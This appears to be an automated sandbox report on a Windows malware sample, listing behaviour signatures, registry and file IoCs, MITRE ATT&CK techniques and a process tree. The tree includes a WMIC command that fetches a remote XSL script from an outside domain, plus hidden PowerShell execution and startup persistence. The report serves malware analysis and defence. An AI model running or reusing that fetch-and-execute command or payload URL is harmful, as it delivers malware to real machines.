72b228f51cf5a1b7600f0e0848145e4e54e54838977a5a5b1c85f69b64b92cf5

Resubmissions

13-11-2019 07:33

191113-s6xvalyd5a 0

12-11-2019 15:34

191112-9te2mt6rbs 0

04-11-2019 16:22

191104-pvpshym7va 0

Analysis

max time kernel
145s
max time network
150s
resource
win10v191014

Sharing

Copy URL

Twitter E-mail

General

Target

test.zip
Sample

191113-s6xvalyd5a
SHA256

72b228f51cf5a1b7600f0e0848145e4e54e54838977a5a5b1c85f69b64b92cf5

Score

N/A

Malware Config

Signatures

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5048 wrote to memory of 2016	5048	msiexec.exe	76
PID 3164 wrote to memory of 3680	3164	SppExtComObj.exe	79
PID 2016 wrote to memory of 4656	2016	MsiExec.exe	80
PID 5048 wrote to memory of 4668	5048	msiexec.exe	82
PID 4656 wrote to memory of 4700	4656	WMIC.exe	83
PID 4668 wrote to memory of 4276	4668	MsiExec.exe	85
PID 4700 wrote to memory of 4836	4700	powershell.exe	87
PID 4836 wrote to memory of 4900	4836	nvsmartmaxapp.exe	88

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
5048	msiexec.exe
4700	powershell.exe
4900	wmplayer.exe

Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	pid	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	3820	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	3820	svchost.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Modify Registry

T1112

description	ioc	pid	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0"	4160	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1"	4160	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4968	msiexec.exe

Suspicious use of AdjustPrivilegeToken 55 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4968	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4968	msiexec.exe
Token: SeSecurityPrivilege	5048	msiexec.exe
Token: SeCreateTokenPrivilege	4968	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4968	msiexec.exe
Token: SeLockMemoryPrivilege	4968	msiexec.exe
Token: SeMachineAccountPrivilege	4968	msiexec.exe
Token: SeTcbPrivilege	4968	msiexec.exe
Token: SeSecurityPrivilege	4968	msiexec.exe
Token: SeTakeOwnershipPrivilege	4968	msiexec.exe
Token: SeLoadDriverPrivilege	4968	msiexec.exe
Token: SeSystemProfilePrivilege	4968	msiexec.exe
Token: SeSystemtimePrivilege	4968	msiexec.exe
Token: SeProfSingleProcessPrivilege	4968	msiexec.exe
Token: SeIncBasePriorityPrivilege	4968	msiexec.exe
Token: SeCreatePagefilePrivilege	4968	msiexec.exe
Token: SeCreatePermanentPrivilege	4968	msiexec.exe
Token: SeBackupPrivilege	4968	msiexec.exe
Token: SeRestorePrivilege	4968	msiexec.exe
Token: SeDebugPrivilege	4968	msiexec.exe
Token: SeAuditPrivilege	4968	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4968	msiexec.exe
Token: SeChangeNotifyPrivilege	4968	msiexec.exe
Token: SeRemoteShutdownPrivilege	4968	msiexec.exe
Token: SeUndockPrivilege	4968	msiexec.exe
Token: SeSyncAgentPrivilege	4968	msiexec.exe
Token: SeEnableDelegationPrivilege	4968	msiexec.exe
Token: SeManageVolumePrivilege	4968	msiexec.exe
Token: SeImpersonatePrivilege	4968	msiexec.exe
Token: SeCreateGlobalPrivilege	4968	msiexec.exe
Token: SeRestorePrivilege	5048	msiexec.exe
Token: SeTakeOwnershipPrivilege	5048	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4656	WMIC.exe
Token: SeSecurityPrivilege	4656	WMIC.exe
Token: SeTakeOwnershipPrivilege	4656	WMIC.exe
Token: SeLoadDriverPrivilege	4656	WMIC.exe
Token: SeSystemProfilePrivilege	4656	WMIC.exe
Token: SeSystemtimePrivilege	4656	WMIC.exe
Token: SeProfSingleProcessPrivilege	4656	WMIC.exe
Token: SeIncBasePriorityPrivilege	4656	WMIC.exe
Token: SeCreatePagefilePrivilege	4656	WMIC.exe
Token: SeBackupPrivilege	4656	WMIC.exe
Token: SeRestorePrivilege	4656	WMIC.exe
Token: SeShutdownPrivilege	4656	WMIC.exe
Token: SeDebugPrivilege	4656	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4656	WMIC.exe
Token: SeRemoteShutdownPrivilege	4656	WMIC.exe
Token: SeUndockPrivilege	4656	WMIC.exe
Token: SeManageVolumePrivilege	4656	WMIC.exe
Token: 33	4656	WMIC.exe
Token: 34	4656	WMIC.exe
Token: 35	4656	WMIC.exe
Token: 36	4656	WMIC.exe
Token: SeDebugPrivilege	4700	powershell.exe
Token: SeDebugPrivilege	4900	wmplayer.exe

Loads dropped DLL 3 IoCs

pid	Process
4668	MsiExec.exe
4836	nvsmartmaxapp.exe
4900	wmplayer.exe

Uses Volume Shadow Copy WMI provider 3 IoCs

ransomware

description	ioc	pid	Process
Key opened	\Registry\Machine\Software\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C}	4700	powershell.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C}	4700	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}	4700	powershell.exe

Discovering connected drives 3 TTPs 1 IoCs

ransomware

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	pid	Process
File opened (read-only)	\??\C:	4968	msiexec.exe

Executes dropped EXE 2 IoCs

pid	Process
4276	lcADA5.tmp
4836	nvsmartmaxapp.exe

Uses Volume Shadow Copy Service COM API 3 IoCs

ransomware

description	ioc	pid	Process
Key opened	\Registry\Machine\Software\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}	4700	powershell.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}	4700	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}	4700	powershell.exe

Drops startup file 1 IoCs

description	ioc	pid	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nvsmartmaxapp.lnk	4700	powershell.exe

Drops file in system dir 40 IoCs

description	ioc	pid	Process
File created	C:\Windows\Installer\8b77.msi	5048	msiexec.exe
File opened for modification	C:\Windows\Installer\8b77.msi	5048	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	5048	msiexec.exe
File created (read-only)	C:\Windows\Installer\MSI9CFB.tmp	5048	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9CFB.tmp	5048	msiexec.exe
File deleted	C:\Windows\Installer\MSI9CFB.tmp	5048	msiexec.exe
File created (read-only)	C:\Windows\Installer\MSIA912.tmp	5048	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA912.tmp	5048	msiexec.exe
File deleted	C:\Windows\Installer\MSIA912.tmp	5048	msiexec.exe
File created (read-only)	C:\Windows\Installer\MSIAD97.tmp	5048	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAD97.tmp	5048	msiexec.exe
File deleted	C:\Windows\Installer\MSIAD97.tmp	5048	msiexec.exe
File created (read-only)	C:\Windows\Installer\MSIB038.tmp	5048	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB038.tmp	5048	msiexec.exe
File deleted	C:\Windows\Installer\MSIB038.tmp	5048	msiexec.exe
File opened for modification	C:\Windows\Installer\	5048	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	5048	msiexec.exe
File created	C:\Windows\TEMP\~DF4E0DDFD44D53CAC7.TMP	5048	msiexec.exe
File created	C:\Windows\Installer\SourceHash{B7E63CAC-805B-4255-A63C-38D579B3EEAB}	5048	msiexec.exe
File created	C:\Windows\TEMP\~DF6320F2D2BDBC634A.TMP	5048	msiexec.exe
File created (read-only)	C:\Windows\Installer\MSIB1C0.tmp	5048	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB1C0.tmp	5048	msiexec.exe
File created	C:\Windows\TEMP\~DFDBB965D0B4E34850.TMP	5048	msiexec.exe
File created	C:\Windows\TEMP\~DF9A7116871ADB5E12.TMP	5048	msiexec.exe
File deleted	C:\Windows\Installer\MSIB1C0.tmp	5048	msiexec.exe
File created	C:\Windows\TEMP\~DF57E228EAC2BBA201.TMP	5048	msiexec.exe
File created	C:\Windows\TEMP\~DF94F71E65A8EBDA3A.TMP	5048	msiexec.exe
File created	C:\Windows\TEMP\~DF0F8472669B81908A.TMP	5048	msiexec.exe
File created	C:\Windows\TEMP\~DF43D1D7838F0C7873.TMP	5048	msiexec.exe
File deleted	C:\Windows\Installer\8b77.msi	5048	msiexec.exe
File created	C:\Windows\TEMP\~DF5A9A8065AD76D83F.TMP	5048	msiexec.exe
File created	C:\Windows\TEMP\~DF89EB2695FB54D106.TMP	5048	msiexec.exe
File created	C:\Windows\TEMP\~DF692EECC30BF33BC7.TMP	5048	msiexec.exe
File created	C:\Windows\TEMP\~DFA5D4CC0AA4652B9C.TMP	5048	msiexec.exe
File deleted	C:\Windows\Installer\inprogressinstallinfo.ipi	5048	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	4724	svchost.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	4724	svchost.exe
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	4724	svchost.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp	4724	svchost.exe
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp	4724	svchost.exe

Uses Task Scheduler COM API 1 TTPs 19 IoCs

persistence

Query Registry

T1012

description	ioc	pid	Process
Key opened	\Registry\Machine\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	4700	powershell.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	4700	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}	4700	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	4700	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\	4700	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	4700	powershell.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	4700	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32\InprocServer32	4700	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32\	4700	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32\ThreadingModel	4700	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	4700	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	4700	powershell.exe
Key opened	\Registry\Machine\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	4700	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32\Class	4700	powershell.exe
Key opened	\Registry\Machine\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer32	4700	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	4700	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\AppID	4700	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	4700	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	4700	powershell.exe

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\91B5DB3C0CCBD68BD04C24571E27F99D.msi
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of AdjustPrivilegeToken
- Discovering connected drives
PID:4968

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Drops file in system dir
PID:5048

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost
1⤵
PID:5056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
1⤵
PID:5116

C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding F6DCE9C4CAD94F49E07D376778777BF2
1⤵
- Suspicious use of WriteProcessMemory
PID:2016

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:3164

C:\Windows\System32\SLUI.exe
"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
1⤵
PID:3680

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:4656

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 5EC4B6F756F08EB7BF50059B493CC3A2
1⤵
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
PID:4668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Uses Volume Shadow Copy WMI provider
- Uses Volume Shadow Copy Service COM API
- Drops startup file
- Uses Task Scheduler COM API
PID:4700

C:\Users\Admin\AppData\Local\Temp\lcADA5.tmp
"C:\Users\Admin\AppData\Local\Temp\lcADA5.tmp"
1⤵
- Executes dropped EXE
PID:4276

C:\Users\Admin\AppData\Roaming\WFKhm\nvsmartmaxapp.exe
"C:\Users\Admin\AppData\Roaming\WFKhm\nvsmartmaxapp.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
- Executes dropped EXE
PID:4836

C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Loads dropped DLL
PID:4900

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Drops file in system dir
PID:4724

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4372

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
1⤵
- Checks system information in the registry (likely anti-VM)
PID:3820

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup
1⤵
PID:548

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
1⤵
- Windows security modification
PID:4160

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

MITRE ATT&CK Additional techniques

T1089

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4900-25-0x0000000000A50000-0x0000000000A60000-memory.dmp

Filesize
64KB

Download
memory/4900-33-0x0000000000A50000-0x0000000000A60000-memory.dmp

Filesize
64KB

Download
memory/4900-22-0x0000000006380000-0x0000000006381000-memory.dmp

Filesize
4KB

Download
memory/4900-23-0x0000000000A50000-0x0000000000A60000-memory.dmp

Filesize
64KB

Download
memory/4900-24-0x0000000000A50000-0x0000000000A60000-memory.dmp

Filesize
64KB

Download
memory/4900-36-0x0000000000A50000-0x0000000000A60000-memory.dmp

Filesize
64KB

Download
memory/4900-26-0x0000000000A50000-0x0000000000A60000-memory.dmp

Filesize
64KB

Download
memory/4900-27-0x0000000000A50000-0x0000000000A60000-memory.dmp

Filesize
64KB

Download
memory/4900-28-0x0000000000A50000-0x0000000000A60000-memory.dmp

Filesize
64KB

Download
memory/4900-29-0x0000000000A50000-0x0000000000A60000-memory.dmp

Filesize
64KB

Download
memory/4900-30-0x0000000000A50000-0x0000000000A60000-memory.dmp

Filesize
64KB

Download
memory/4900-31-0x0000000000A50000-0x0000000000A60000-memory.dmp

Filesize
64KB

Download
memory/4900-32-0x0000000000A50000-0x0000000000A60000-memory.dmp

Filesize
64KB

Download
memory/4900-20-0x0000000005B80000-0x0000000005B81000-memory.dmp

Filesize
4KB

Download
memory/4900-34-0x0000000000A50000-0x0000000000A60000-memory.dmp

Filesize
64KB

Download
memory/4900-35-0x0000000000A50000-0x0000000000A60000-memory.dmp

Filesize
64KB

Download
memory/4968-0-0x00000202D07A0000-0x00000202D07A4000-memory.dmp

Filesize
16KB

Download